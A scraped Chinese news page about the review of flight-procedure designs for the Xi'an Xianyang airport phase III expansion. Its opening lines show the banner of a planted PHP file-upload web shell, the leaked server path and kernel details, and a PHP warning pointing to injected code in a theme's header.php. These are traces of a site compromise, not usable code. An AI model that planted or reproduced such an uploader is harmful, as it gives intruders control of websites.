PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

为落实统筹疫情防控与经济社会发展的要求,积极支持辖区机场建设,加速项目复工复产,4月11日,民航西北地区管理局组织召开了西安咸阳国际机场三期扩建工程飞行程序初步设计方案审查会。西北管理局、陕西监管局、西北空管局、西部机场集团、西安咸阳机场股份公司、驻场航空公司等单位代表在现场参加了会议,西北管理局副局长孙剑岷出席会议,民航局飞标司二级巡视员涂卫军及航务处人员通过视频形式参会。

会上,西部机场集团对三期扩建工程建设情况及长远意义进行了介绍,设计单位对飞行程序初步设计方案进行了汇报。与会单位代表进行了讨论,针对规章符合性、运行需求满足性、与地面工程的协同性及净空控制方面提出了相关意见建议。 

孙剑岷副局长表示,要加强机场周边净空环境的保护力度;要严格程序设计标准,提升质量和实用性;要加强与地方政府及建设单位协同,确保三期建设顺利推进。

民航局飞标司二级巡视员涂卫军对西北管理局在疫情防控期间周密组织此次审查会给予充分肯定,要求各单位结合新检查单的使用,积极反馈意见和建议,进一步做好飞行程序设计工作。 

此次审查会是西北地区首次组织对四跑道机场飞行程序设计方案进行审查,飞行程序的规模、数量和复杂度较以前大为增加。为确保审查质量,西北管理局克服疫情防控期间的困难,协调各单位做了大量的准备工作。飞行程序设计审查工作的实施,为西安咸阳国际机场三期扩建工程各项工作的顺利推进提供了基础条件。

来源:中国民航网,通讯员:杨雅芝 报道

作者 一潼

发表回复